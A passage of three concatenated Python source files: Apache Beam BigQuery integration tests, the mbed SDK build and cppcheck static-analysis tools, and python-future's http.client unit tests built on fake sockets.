query="SELECT name, foundation FROM %s" % output_table_4,
data=[(d['name'], d['foundation']) for d in _ELEMENTS
if 'foundation' in d])
]
args = self.test_pipeline.get_full_options_as_args(
on_success_matcher=all_of(*pipeline_verifiers),
experiments='use_beam_bq_sink')
with beam.Pipeline(argv=args) as p:
input = p | beam.Create(_ELEMENTS, reshuffle=False)
schema_map_pcv = beam.pvalue.AsDict(
p | "MakeSchemas" >> beam.Create(schema_kv_pairs))
table_record_pcv = beam.pvalue.AsDict(
p | "MakeTables" >> beam.Create([('table1', output_table_1),
('table2', output_table_2)]))
# Get all input in same machine
input = (
input
| beam.Map(lambda x: (None, x))
| beam.GroupByKey()
| beam.FlatMap(lambda elm: elm[1]))
_ = (
input | "WriteWithMultipleDestsFreely" >> bigquery.WriteToBigQuery(
table=lambda x,
tables:
(tables['table1'] if 'language' in x else tables['table2']),
table_side_inputs=(table_record_pcv, ),
schema=lambda dest,
schema_map: schema_map.get(dest, None),
schema_side_inputs=(schema_map_pcv, ),
create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
write_disposition=beam.io.BigQueryDisposition.WRITE_EMPTY))
_ = (
input | "WriteWithMultipleDests" >> bigquery.WriteToBigQuery(
table=lambda x:
(output_table_3 if 'language' in x else output_table_4),
schema=lambda dest,
schema_map: schema_map.get(dest, None),
schema_side_inputs=(schema_map_pcv, ),
create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
write_disposition=beam.io.BigQueryDisposition.WRITE_EMPTY,
max_file_size=20,
max_files_per_bundle=-1))
@attr('IT')
def test_bqfl_streaming(self):
if isinstance(self.test_pipeline.runner, TestDataflowRunner):
self.skipTest("TestStream is not supported on TestDataflowRunner")
output_table = '%s_%s' % (self.output_table, 'ints')
_SIZE = 100
schema = self.BIG_QUERY_STREAMING_SCHEMA
l = [{'Integr': i} for i in range(_SIZE)]
state_matcher = PipelineStateMatcher(PipelineState.RUNNING)
bq_matcher = BigqueryFullResultStreamingMatcher(
project=self.project,
query="SELECT Integr FROM %s" % output_table,
data=[(i, ) for i in range(100)])
args = self.test_pipeline.get_full_options_as_args(
on_success_matcher=all_of(state_matcher, bq_matcher),
experiments='use_beam_bq_sink',
streaming=True)
with beam.Pipeline(argv=args) as p:
stream_source = (
TestStream().advance_watermark_to(0).advance_processing_time(
100).add_elements(l[:_SIZE // 4]).
advance_processing_time(100).advance_watermark_to(100).add_elements(
l[_SIZE // 4:2 * _SIZE // 4]).advance_processing_time(
100).advance_watermark_to(200).add_elements(
l[2 * _SIZE // 4:3 * _SIZE // 4]).advance_processing_time(
100).advance_watermark_to(300).add_elements(
l[3 * _SIZE // 4:]).advance_processing_time(
100).advance_watermark_to_infinity())
_ = (p
| stream_source
| bigquery.WriteToBigQuery(output_table,
schema=schema,
method=bigquery.WriteToBigQuery \
.Method.FILE_LOADS,
triggering_frequency=100))
@attr('IT')
def test_one_job_fails_all_jobs_fail(self):
# If one of the import jobs fails, then other jobs must not be performed.
# This is to avoid reinsertion of some records when a pipeline fails and
# is rerun.
output_table_1 = '%s%s' % (self.output_table, 1)
output_table_2 = '%s%s' % (self.output_table, 2)
self.bigquery_client.get_or_create_table(
self.project,
self.dataset_id,
output_table_1.split('.')[1],
bigquery_tools.parse_table_schema_from_json(self.BIG_QUERY_SCHEMA),
None,
None)
self.bigquery_client.get_or_create_table(
self.project,
self.dataset_id,
output_table_2.split('.')[1],
bigquery_tools.parse_table_schema_from_json(self.BIG_QUERY_SCHEMA_2),
None,
None)
pipeline_verifiers = [
BigqueryFullResultMatcher(
project=self.project,
query="SELECT name, language FROM %s" % output_table_1,
data=[]),
BigqueryFullResultMatcher(
project=self.project,
query="SELECT name, foundation FROM %s" % output_table_2,
data=[])
]
args = self.test_pipeline.get_full_options_as_args(
experiments='use_beam_bq_sink')
with self.assertRaises(Exception):
# The pipeline below fails because neither a schema nor SCHEMA_AUTODETECT
# are specified.
with beam.Pipeline(argv=args) as p:
input = p | beam.Create(_ELEMENTS)
input2 = p | "Broken record" >> beam.Create(['language_broken_record'])
input = (input, input2) | beam.Flatten()
_ = (
input | "WriteWithMultipleDests" >> bigquery.WriteToBigQuery(
table=lambda x:
(output_table_1 if 'language' in x else output_table_2),
create_disposition=(
beam.io.BigQueryDisposition.CREATE_IF_NEEDED),
write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND,
temp_file_format=bigquery_tools.FileFormat.JSON))
hamcrest_assert(p, all_of(*pipeline_verifiers))
def tearDown(self):
request = bigquery_api.BigqueryDatasetsDeleteRequest(
projectId=self.project, datasetId=self.dataset_id, deleteContents=True)
try:
_LOGGER.info(
"Deleting dataset %s in project %s", self.dataset_id, self.project)
self.bigquery_client.client.datasets.Delete(request)
except HttpError:
_LOGGER.debug(
'Failed to clean up dataset %s in project %s',
self.dataset_id,
self.project)
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
| |
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import tempfile
import colorama
from types import ListType
from shutil import rmtree
from os.path import join, exists, basename
from workspace_tools.utils import mkdir, run_cmd, run_cmd_ext
from workspace_tools.paths import MBED_TARGETS_PATH, MBED_LIBRARIES, MBED_API, MBED_HAL, MBED_COMMON
from workspace_tools.targets import TARGET_NAMES, TARGET_MAP
from workspace_tools.libraries import Library
from workspace_tools.toolchains import TOOLCHAIN_CLASSES
from jinja2 import FileSystemLoader
from jinja2.environment import Environment
def build_project(src_path, build_path, target, toolchain_name,
libraries_paths=None, options=None, linker_script=None,
clean=False, notify=None, verbose=False, name=None, macros=None, inc_dirs=None, jobs=1, silent=False):
""" This function builds project. Project can be for example one test / UT
"""
# Toolchain instance
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, notify, macros, silent)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
src_paths = [src_path] if type(src_path) != ListType else src_path
# We need to remove all paths which are repeated to avoid
# multiple compilations and linking with the same objects
src_paths = [src_paths[0]] + list(set(src_paths[1:]))
PROJECT_BASENAME = basename(src_paths[0])
if name is None:
# We will use default project name based on project folder name
name = PROJECT_BASENAME
toolchain.info("Building project %s (%s, %s)" % (PROJECT_BASENAME.upper(), target.name, toolchain_name))
else:
# User used custom global project name to have the same name for the
toolchain.info("Building project %s to %s (%s, %s)" % (PROJECT_BASENAME.upper(), name, target.name, toolchain_name))
# Scan src_path and libraries_paths for resources
resources = toolchain.scan_resources(src_paths[0])
for path in src_paths[1:]:
resources.add(toolchain.scan_resources(path))
if libraries_paths is not None:
src_paths.extend(libraries_paths)
for path in libraries_paths:
resources.add(toolchain.scan_resources(path))
if linker_script is not None:
resources.linker_script = linker_script
# Build Directory
if clean:
if exists(build_path):
rmtree(build_path)
mkdir(build_path)
# We need to add if necessary additional include directories
if inc_dirs:
if type(inc_dirs) == ListType:
resources.inc_dirs.extend(inc_dirs)
else:
resources.inc_dirs.append(inc_dirs)
# Compile Sources
for path in src_paths:
src = toolchain.scan_resources(path)
objects = toolchain.compile_sources(src, build_path, resources.inc_dirs)
resources.objects.extend(objects)
# Link Program
return toolchain.link_program(resources, build_path, name)
def build_library(src_paths, build_path, target, toolchain_name,
dependencies_paths=None, options=None, name=None, clean=False,
notify=None, verbose=False, macros=None, inc_dirs=None, inc_dirs_ext=None, jobs=1, silent=False):
""" src_path: the path of the source directory
build_path: the path of the build directory
target: ['LPC1768', 'LPC11U24', 'LPC2368']
toolchain: ['ARM', 'uARM', 'GCC_ARM', 'GCC_CS', 'GCC_CR']
library_paths: List of paths to additional libraries
clean: Rebuild everything if True
notify: Notify function for logs
verbose: Write the actual tools command lines if True
inc_dirs: additional include directories which should be included in build
inc_dirs_ext: additional include directories which should be copied to library directory
"""
if type(src_paths) != ListType:
src_paths = [src_paths]
for src_path in src_paths:
if not exists(src_path):
raise Exception("The library source folder does not exist: %s", src_path)
# Toolchain instance
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify, silent=silent)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
# The first path will give the name to the library
name = basename(src_paths[0])
toolchain.info("Building library %s (%s, %s)" % (name.upper(), target.name, toolchain_name))
# Scan Resources
resources = []
for src_path in src_paths:
resources.append(toolchain.scan_resources(src_path))
# Add extra include directories / files which are required by library
# This files usually are not in the same directory as source files so
# previous scan will not include them
if inc_dirs_ext is not None:
for inc_ext in inc_dirs_ext:
resources.append(toolchain.scan_resources(inc_ext))
# Dependencies Include Paths
dependencies_include_dir = []
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
dependencies_include_dir.extend(lib_resources.inc_dirs)
if inc_dirs:
dependencies_include_dir.extend(inc_dirs)
# Create the desired build directory structure
bin_path = join(build_path, toolchain.obj_path)
mkdir(bin_path)
tmp_path = join(build_path, '.temp', toolchain.obj_path)
mkdir(tmp_path)
# Copy Headers
for resource in resources:
toolchain.copy_files(resource.headers, build_path, rel_path=resource.base_path)
dependencies_include_dir.extend(toolchain.scan_resources(build_path).inc_dirs)
# Compile Sources
objects = []
for resource in resources:
objects.extend(toolchain.compile_sources(resource, tmp_path, dependencies_include_dir))
toolchain.build_library(objects, bin_path, name)
def build_lib(lib_id, target, toolchain, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1, silent=False):
""" Wrapper for build_library function.
Function builds library in proper directory using all dependencies and macros defined by user.
"""
lib = Library(lib_id)
if lib.is_supported(target, toolchain):
# We need to combine macros from parameter list with macros from library definition
MACROS = lib.macros if lib.macros else []
if macros:
MACROS.extend(macros)
build_library(lib.source_dir, lib.build_dir, target, toolchain, lib.dependencies, options,
verbose=verbose,
silent=silent,
clean=clean,
macros=MACROS,
notify=notify,
inc_dirs=lib.inc_dirs,
inc_dirs_ext=lib.inc_dirs_ext,
jobs=jobs)
else:
print 'Library "%s" is not yet supported on target %s with toolchain %s' % (lib_id, target.name, toolchain)
# We do have unique legacy conventions about how we build and package the mbed library
def build_mbed_libs(target, toolchain_name, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1, silent=False):
""" Function returns True is library was built and false if building was skipped """
# Check toolchain support
if toolchain_name not in target.supported_toolchains:
supported_toolchains_text = ", ".join(target.supported_toolchains)
print '%s target is not yet supported by toolchain %s' % (target.name, toolchain_name)
print '%s target supports %s toolchain%s' % (target.name, supported_toolchains_text, 's' if len(target.supported_toolchains) > 1 else '')
return False
# Toolchain
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify, silent=silent)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
# Source and Build Paths
BUILD_TARGET = join(MBED_LIBRARIES, "TARGET_" + target.name)
BUILD_TOOLCHAIN = join(BUILD_TARGET, "TOOLCHAIN_" + toolchain.name)
mkdir(BUILD_TOOLCHAIN)
TMP_PATH = join(MBED_LIBRARIES, '.temp', toolchain.obj_path)
mkdir(TMP_PATH)
# CMSIS
toolchain.info("Building library %s (%s, %s)"% ('CMSIS', target.name, toolchain_name))
cmsis_src = join(MBED_TARGETS_PATH, "cmsis")
resources = toolchain.scan_resources(cmsis_src)
toolchain.copy_files(resources.headers, BUILD_TARGET)
toolchain.copy_files(resources.linker_script, BUILD_TOOLCHAIN)
toolchain.copy_files(resources.bin_files, BUILD_TOOLCHAIN)
objects = toolchain.compile_sources(resources, TMP_PATH)
toolchain.copy_files(objects, BUILD_TOOLCHAIN)
# mbed
toolchain.info("Building library %s (%s, %s)" % ('MBED', target.name, toolchain_name))
# Common Headers
toolchain.copy_files(toolchain.scan_resources(MBED_API).headers, MBED_LIBRARIES)
toolchain.copy_files(toolchain.scan_resources(MBED_HAL).headers, MBED_LIBRARIES)
# Target specific sources
HAL_SRC = join(MBED_TARGETS_PATH, "hal")
hal_implementation = toolchain.scan_resources(HAL_SRC)
toolchain.copy_files(hal_implementation.headers + hal_implementation.hex_files + hal_implementation.libraries, BUILD_TARGET, HAL_SRC)
incdirs = toolchain.scan_resources(BUILD_TARGET).inc_dirs
objects = toolchain.compile_sources(hal_implementation, TMP_PATH, [MBED_LIBRARIES] + incdirs)
# Common Sources
mbed_resources = toolchain.scan_resources(MBED_COMMON)
objects += toolchain.compile_sources(mbed_resources, TMP_PATH, [MBED_LIBRARIES] + incdirs)
# A number of compiled files need to be copied as objects as opposed to
# being part of the mbed library, for reasons that have to do with the way
# the linker search for symbols in archives. These are:
# - retarget.o: to make sure that the C standard lib symbols get overridden
# - board.o: mbed_die is weak
# - mbed_overrides.o: this contains platform overrides of various weak SDK functions
separate_names, separate_objects = ['retarget.o', 'board.o', 'mbed_overrides.o'], []
for o in objects:
for name in separate_names:
if o.endswith(name):
separate_objects.append(o)
for o in separate_objects:
objects.remove(o)
toolchain.build_library(objects, BUILD_TOOLCHAIN, "mbed")
for o in separate_objects:
toolchain.copy_files(o, BUILD_TOOLCHAIN)
return True
def get_unique_supported_toolchains():
""" Get list of all unique toolchains supported by targets """
unique_supported_toolchains = []
for target in TARGET_NAMES:
for toolchain in TARGET_MAP[target].supported_toolchains:
if toolchain not in unique_supported_toolchains:
unique_supported_toolchains.append(toolchain)
return unique_supported_toolchains
def mcu_toolchain_matrix(verbose_html=False, platform_filter=None):
""" Shows target map using prettytable """
unique_supported_toolchains = get_unique_supported_toolchains()
from prettytable import PrettyTable # Only use it in this function so building works without extra modules
# All tests status table print
columns = ["Platform"] + unique_supported_toolchains
pt = PrettyTable(["Platform"] + unique_supported_toolchains)
# Align table
for col in columns:
pt.align[col] = "c"
pt.align["Platform"] = "l"
perm_counter = 0
target_counter = 0
for target in sorted(TARGET_NAMES):
if platform_filter is not None:
# FIlter out platforms using regex
if re.search(platform_filter, target) is None:
continue
target_counter += 1
row = [target] # First column is platform name
default_toolchain = TARGET_MAP[target].default_toolchain
for unique_toolchain in unique_supported_toolchains:
text = "-"
if default_toolchain == unique_toolchain:
text = "Default"
perm_counter += 1
elif unique_toolchain in TARGET_MAP[target].supported_toolchains:
text = "Supported"
perm_counter += 1
row.append(text)
pt.add_row(row)
result = pt.get_html_string() if verbose_html else pt.get_string()
result += "\n"
result += "*Default - default on-line compiler\n"
result += "*Supported - supported off-line compiler\n"
result += "\n"
result += "Total platforms: %d\n"% (target_counter)
result += "Total permutations: %d"% (perm_counter)
return result
def get_target_supported_toolchains(target):
""" Returns target supported toolchains list """
return TARGET_MAP[target].supported_toolchains if target in TARGET_MAP else None
def static_analysis_scan(target, toolchain_name, CPPCHECK_CMD, CPPCHECK_MSG_FORMAT, options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1):
# Toolchain
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
toolchain.build_all = clean
# Source and Build Paths
BUILD_TARGET = join(MBED_LIBRARIES, "TARGET_" + target.name)
BUILD_TOOLCHAIN = join(BUILD_TARGET, "TOOLCHAIN_" + toolchain.name)
mkdir(BUILD_TOOLCHAIN)
TMP_PATH = join(MBED_LIBRARIES, '.temp', toolchain.obj_path)
mkdir(TMP_PATH)
# CMSIS
toolchain.info("Static analysis for %s (%s, %s)" % ('CMSIS', target.name, toolchain_name))
cmsis_src = join(MBED_TARGETS_PATH, "cmsis")
resources = toolchain.scan_resources(cmsis_src)
# Copy files before analysis
toolchain.copy_files(resources.headers, BUILD_TARGET)
toolchain.copy_files(resources.linker_script, BUILD_TOOLCHAIN)
# Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
includes = ["-I%s"% i for i in resources.inc_dirs]
includes.append("-I%s"% str(BUILD_TARGET))
c_sources = " ".join(resources.c_sources)
cpp_sources = " ".join(resources.cpp_sources)
macros = ["-D%s"% s for s in toolchain.get_symbols() + toolchain.macros]
includes = map(str.strip, includes)
macros = map(str.strip, macros)
check_cmd = CPPCHECK_CMD
check_cmd += CPPCHECK_MSG_FORMAT
check_cmd += includes
check_cmd += macros
# We need to pass some params via file to avoid "command line too long in some OSs"
tmp_file = tempfile.NamedTemporaryFile(delete=False)
tmp_file.writelines(line + '\n' for line in c_sources.split())
tmp_file.writelines(line + '\n' for line in cpp_sources.split())
tmp_file.close()
check_cmd += ["--file-list=%s"% tmp_file.name]
_stdout, _stderr, _rc = run_cmd(check_cmd)
if verbose:
print _stdout
print _stderr
# =========================================================================
# MBED
toolchain.info("Static analysis for %s (%s, %s)" % ('MBED', target.name, toolchain_name))
# Common Headers
toolchain.copy_files(toolchain.scan_resources(MBED_API).headers, MBED_LIBRARIES)
toolchain.copy_files(toolchain.scan_resources(MBED_HAL).headers, MBED_LIBRARIES)
# Target specific sources
HAL_SRC = join(MBED_TARGETS_PATH, "hal")
hal_implementation = toolchain.scan_resources(HAL_SRC)
# Copy files before analysis
toolchain.copy_files(hal_implementation.headers + hal_implementation.hex_files, BUILD_TARGET, HAL_SRC)
incdirs = toolchain.scan_resources(BUILD_TARGET)
target_includes = ["-I%s" % i for i in incdirs.inc_dirs]
target_includes.append("-I%s"% str(BUILD_TARGET))
target_includes.append("-I%s"% str(HAL_SRC))
target_c_sources = " ".join(incdirs.c_sources)
target_cpp_sources = " ".join(incdirs.cpp_sources)
target_macros = ["-D%s"% s for s in toolchain.get_symbols() + toolchain.macros]
# Common Sources
mbed_resources = toolchain.scan_resources(MBED_COMMON)
# Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
mbed_includes = ["-I%s" % i for i in mbed_resources.inc_dirs]
mbed_includes.append("-I%s"% str(BUILD_TARGET))
mbed_includes.append("-I%s"% str(MBED_COMMON))
mbed_includes.append("-I%s"% str(MBED_API))
mbed_includes.append("-I%s"% str(MBED_HAL))
mbed_c_sources = " ".join(mbed_resources.c_sources)
mbed_cpp_sources = " ".join(mbed_resources.cpp_sources)
target_includes = map(str.strip, target_includes)
mbed_includes = map(str.strip, mbed_includes)
target_macros = map(str.strip, target_macros)
check_cmd = CPPCHECK_CMD
check_cmd += CPPCHECK_MSG_FORMAT
check_cmd += target_includes
check_cmd += mbed_includes
check_cmd += target_macros
# We need to pass some parames via file to avoid "command line too long in some OSs"
tmp_file = tempfile.NamedTemporaryFile(delete=False)
tmp_file.writelines(line + '\n' for line in target_c_sources.split())
tmp_file.writelines(line + '\n' for line in target_cpp_sources.split())
tmp_file.writelines(line + '\n' for line in mbed_c_sources.split())
tmp_file.writelines(line + '\n' for line in mbed_cpp_sources.split())
tmp_file.close()
check_cmd += ["--file-list=%s"% tmp_file.name]
_stdout, _stderr, _rc = run_cmd_ext(check_cmd)
if verbose:
print _stdout
print _stderr
def static_analysis_scan_lib(lib_id, target, toolchain, cppcheck_cmd, cppcheck_msg_format,
options=None, verbose=False, clean=False, macros=None, notify=None, jobs=1):
lib = Library(lib_id)
if lib.is_supported(target, toolchain):
static_analysis_scan_library(lib.source_dir, lib.build_dir, target, toolchain, cppcheck_cmd, cppcheck_msg_format,
lib.dependencies, options,
verbose=verbose, clean=clean, macros=macros, notify=notify, jobs=jobs)
else:
print 'Library "%s" is not yet supported on target %s with toolchain %s'% (lib_id, target.name, toolchain)
def static_analysis_scan_library(src_paths, build_path, target, toolchain_name, cppcheck_cmd, cppcheck_msg_format,
dependencies_paths=None, options=None, name=None, clean=False,
notify=None, verbose=False, macros=None, jobs=1):
""" Function scans library (or just some set of sources/headers) for staticly detectable defects """
if type(src_paths) != ListType:
src_paths = [src_paths]
for src_path in src_paths:
if not exists(src_path):
raise Exception("The library source folder does not exist: %s", src_path)
# Toolchain instance
toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, macros=macros, notify=notify)
toolchain.VERBOSE = verbose
toolchain.jobs = jobs
# The first path will give the name to the library
name = basename(src_paths[0])
toolchain.info("Static analysis for library %s (%s, %s)" % (name.upper(), target.name, toolchain_name))
# Scan Resources
resources = []
for src_path in src_paths:
resources.append(toolchain.scan_resources(src_path))
# Dependencies Include Paths
dependencies_include_dir = []
if dependencies_paths is not None:
for path in dependencies_paths:
lib_resources = toolchain.scan_resources(path)
dependencies_include_dir.extend(lib_resources.inc_dirs)
# Create the desired build directory structure
bin_path = join(build_path, toolchain.obj_path)
mkdir(bin_path)
tmp_path = join(build_path, '.temp', toolchain.obj_path)
mkdir(tmp_path)
# Gather include paths, c, cpp sources and macros to transfer to cppcheck command line
includes = ["-I%s" % i for i in dependencies_include_dir + src_paths]
c_sources = " "
cpp_sources = " "
macros = ['-D%s' % s for s in toolchain.get_symbols() + toolchain.macros]
# Copy Headers
for resource in resources:
toolchain.copy_files(resource.headers, build_path, rel_path=resource.base_path)
includes += ["-I%s" % i for i in resource.inc_dirs]
c_sources += " ".join(resource.c_sources) + " "
cpp_sources += " ".join(resource.cpp_sources) + " "
dependencies_include_dir.extend(toolchain.scan_resources(build_path).inc_dirs)
includes = map(str.strip, includes)
macros = map(str.strip, macros)
check_cmd = cppcheck_cmd
check_cmd += cppcheck_msg_format
check_cmd += includes
check_cmd += macros
# We need to pass some parameters via file to avoid "command line too long in some OSs"
# Temporary file is created to store e.g. cppcheck list of files for command line
tmp_file = tempfile.NamedTemporaryFile(delete=False)
tmp_file.writelines(line + '\n' for line in c_sources.split())
tmp_file.writelines(line + '\n' for line in cpp_sources.split())
tmp_file.close()
check_cmd += ["--file-list=%s"% tmp_file.name]
# This will allow us to grab result from both stdio and stderr outputs (so we can show them)
# We assume static code analysis tool is outputting defects on STDERR
_stdout, _stderr, _rc = run_cmd_ext(check_cmd)
if verbose:
print _stdout
print _stderr
def print_build_results(result_list, build_name):
""" Generate result string for build results """
result = ""
if len(result_list) > 0:
result += build_name + "\n"
result += "\n".join([" * %s" % f for f in result_list])
result += "\n"
return result
def write_build_report(build_report, template_filename, filename):
build_report_failing = []
build_report_passing = []
for report in build_report:
if len(report["failing"]) > 0:
build_report_failing.append(report)
else:
build_report_passing.append(report)
env = Environment(extensions=['jinja2.ext.with_'])
env.loader = FileSystemLoader('ci_templates')
template = env.get_template(template_filename)
with open(filename, 'w+') as f:
f.write(template.render(failing_builds=build_report_failing, passing_builds=build_report_passing))
| |
"""
Tests for the http.client module
Adapted for the python-future module from the Python 2.7 standard library
tests. The adaptations are to cope with the unicode_literals syntax.
"""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
from future import standard_library
from future.builtins import *
from future import utils
from future.tests.base import unittest
from http import client
import array
import io
import socket
import errno
TestCase = unittest.TestCase
from test import support
HOST = support.HOST
class FakeSocket(object):
def __init__(self, text, fileclass=io.BytesIO):
if isinstance(text, type(u'')): # i.e. unicode string
text = text.encode('ascii')
self.text = text
self.fileclass = fileclass
self.data = bytes(b'')
def sendall(self, data):
olddata = self.data
assert isinstance(olddata, type(b'')) # i.e. native string type. FIXME!
if utils.PY3:
self.data += data
else:
if isinstance(data, type(u'')): # i.e. unicode
newdata = data.encode('ascii')
elif isinstance(data, type(b'')): # native string type. FIXME!
newdata = bytes(data)
elif isinstance(data, bytes):
newdata = data
elif isinstance(data, array.array):
newdata = data.tostring()
else:
newdata = bytes(b'').join(chr(d) for d in data)
self.data += newdata
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise client.UnimplementedFileMode()
return self.fileclass(self.text)
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise socket.error(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFStringIO(io.BytesIO):
"""Like StringIO, but raises AssertionError on EOF.
This is used below to test that http.client doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = io.BytesIO.read(self, n)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = io.BytesIO.readline(self, length)
if data == b'':
raise AssertionError('caller tried to read past EOF')
return data
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(b':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].decode('ascii').lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_content_length_0(self):
class ContentLengthChecker(list):
def __init__(self):
list.__init__(self)
self.content_length = None
def append(self, item):
kv = item.split(b':', 1)
if len(kv) > 1 and kv[0].lower() == b'content-length':
self.content_length = kv[1].strip()
list.append(self, item)
# POST with empty body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request('POST', '/', '')
self.assertEqual(conn._buffer.content_length, b'0',
'Header Content-Length not set')
# PUT request with empty body
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn._buffer = ContentLengthChecker()
conn.request('PUT', '/', '')
self.assertEqual(conn._buffer.content_length, b'0',
'Header Content-Length not set')
def test_putheader(self):
conn = client.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length', 42)
self.assertTrue(b'Content-length: 42' in conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should wrapped by [] if
# its actual IPv6 address
expected = bytes(b'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n') + \
bytes(b'Accept-Encoding: identity\r\n\r\n')
conn = client.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = bytes(b'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n') + \
bytes(b'Accept-Encoding: identity\r\n\r\n')
conn = client.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), b'Text')
self.assertTrue(resp.isclosed())
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
self.assertRaises(client.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = client.BadStatusLine('')
if not utils.PY3:
self.assertEqual(repr(exc), '''BadStatusLine("u\'\'",)''')
else:
self.assertEqual(repr(exc), '''BadStatusLine("\'\'",)''')
def test_partial_reads(self):
# if we have a length, the system knows when to close itself
# same behaviour than when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(bytes(resp.read(2)), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(bytes(resp.read(2)), b'xt')
self.assertTrue(resp.isclosed())
def test_partial_reads_no_content_length(self):
# when no length is present, the socket should be gracefully closed when
# all data was read
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_partial_reads_incomplete_body(self):
# if the server shuts down the connection before the whole
# content-length is delivered, the socket is gracefully closed
body = "HTTP/1.1 200 Ok\r\nContent-Length: 10\r\n\r\nText"
sock = FakeSocket(body)
resp = client.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), b'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), b'xt')
self.assertEqual(resp.read(1), b'')
self.assertTrue(resp.isclosed())
def test_host_port(self):
# Check invalid host_port
# Note that http.client does not accept user:password@ in the host-port.
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(client.InvalidURL, client.HTTPConnection, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000", "fe80::207:e9ff:fe9b",
8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80)):
c = client.HTTPConnection(hp)
self.assertEqual(h, c.host)
self.assertEqual(p, c.port)
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE";'
' Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = client.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
self.assertEqual(cookies, hdr)
def test_read_head(self):
